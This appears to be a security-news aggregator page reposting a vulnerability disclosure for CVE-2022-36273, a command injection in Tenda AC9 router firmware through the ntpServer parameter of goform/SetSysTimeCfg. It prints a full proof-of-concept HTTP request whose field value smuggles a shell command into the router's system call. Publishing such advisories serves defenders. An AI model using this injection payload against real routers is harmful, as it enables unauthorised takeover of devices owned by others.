Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-36273: CVEIDs/TendaAC9 at main · F0und-icu/CVEIDs

Tenda AC9 V15.03.2.21_cn is vulnerable to command injection via goform/SetSysTimeCfg.

CVE
Open in Source
#vulnerability#web#mac#windows#apple#intel#chrome#webkit

The parameter Ntpserver is passed to tip_sntp_handle->doSystemCmd. A command injection vulnerability was formed.

POST /goform/SetSysTimeCfg HTTP/1.1
Host: 192.168.0.1
Content-Length: 76
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/system_time.html?random=0.9150451753353981&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=25f9e794323b453885f5181f1b624d0btjotgb
Connection: close

timePeriod=86400&ntpServer="time.windows.com| ls > /tmp/f0und"&timeZone=20%3A00

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE